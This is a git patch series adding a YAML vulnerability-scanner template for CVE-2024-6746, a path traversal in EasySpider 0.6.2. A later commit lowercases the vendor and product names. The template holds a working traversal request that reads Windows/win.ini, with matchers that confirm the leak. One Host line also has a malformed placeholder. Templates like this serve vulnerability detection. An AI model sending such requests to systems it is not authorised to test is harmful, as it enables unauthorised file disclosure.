From 85bf33e86e9ebf6a4e302cb0f7f3bc79b281569e Mon Sep 17 00:00:00 2001
From: Kazgangap <halilkirazkaya@yandex.com>
Date: Wed, 17 Jul 2024 02:16:51 +0300
Subject: [PATCH 1/2] add CVE-2024-6746

---
 network/cves/2024/CVE-2024-6746.yaml | 54 ++++++++++++++++++++++++++++
 1 file changed, 54 insertions(+)
 create mode 100644 network/cves/2024/CVE-2024-6746.yaml

diff --git a/network/cves/2024/CVE-2024-6746.yaml b/network/cves/2024/CVE-2024-6746.yaml
new file mode 100644
index 0000000000..aa5e7eb642
--- /dev/null
+++ b/network/cves/2024/CVE-2024-6746.yaml
@@ -0,0 +1,54 @@
+id: CVE-2024-6746
+
+info:
+  name: EasySpider 0.6.2 - Arbitrary File Read
+  author: securityforeveryone
+  severity: medium
+  description: |
+    A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.
+  reference:
+    - https://github.com/NaiboWang/EasySpider/issues/466
+    - https://cvefeed.io/vuln/detail/CVE-2024-6746
+    - https://vuldb.com/?id.271477
+    - https://vuldb.com/?submit.371998
+    - https://vuldb.com/?ctiid.271477
+    - https://github.com/NaiboWang/EasySpider
+  classification:
+    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2024-6746
+    cwe-id: CWE-24
+    epss-score: 0.00045
+    epss-percentile: 0.1594
+  metadata:
+    vendor: NaiboWang
+    product: EasySpider
+  tags: cve,cve2024,lfi,network
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /taskGrid/tasklist.html HTTP/1.1
+        Host: {{Hostname}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body,"Task List","Task ID","Task Name","URL","<title>任务列表 | Task List</title>")'
+          - 'status_code == 200'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /../../../../../../../../../Windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body,"bit app support","fonts","extensions")'
+          - 'status_code == 200'
+        condition: and

From bde3fa47229be0563c1fe3e1c9d34978a13f698e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Wed, 17 Jul 2024 11:09:21 +0530
Subject: [PATCH 2/2] minor update

---
 network/cves/2024/CVE-2024-6746.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/network/cves/2024/CVE-2024-6746.yaml b/network/cves/2024/CVE-2024-6746.yaml
index aa5e7eb642..abb0c3b999 100644
--- a/network/cves/2024/CVE-2024-6746.yaml
+++ b/network/cves/2024/CVE-2024-6746.yaml
@@ -21,8 +21,8 @@ info:
     epss-score: 0.00045
     epss-percentile: 0.1594
   metadata:
-    vendor: NaiboWang
-    product: EasySpider
+    vendor: naibowang
+    product: easyspider
   tags: cve,cve2024,lfi,network
 
 flow: http(1) && http(2)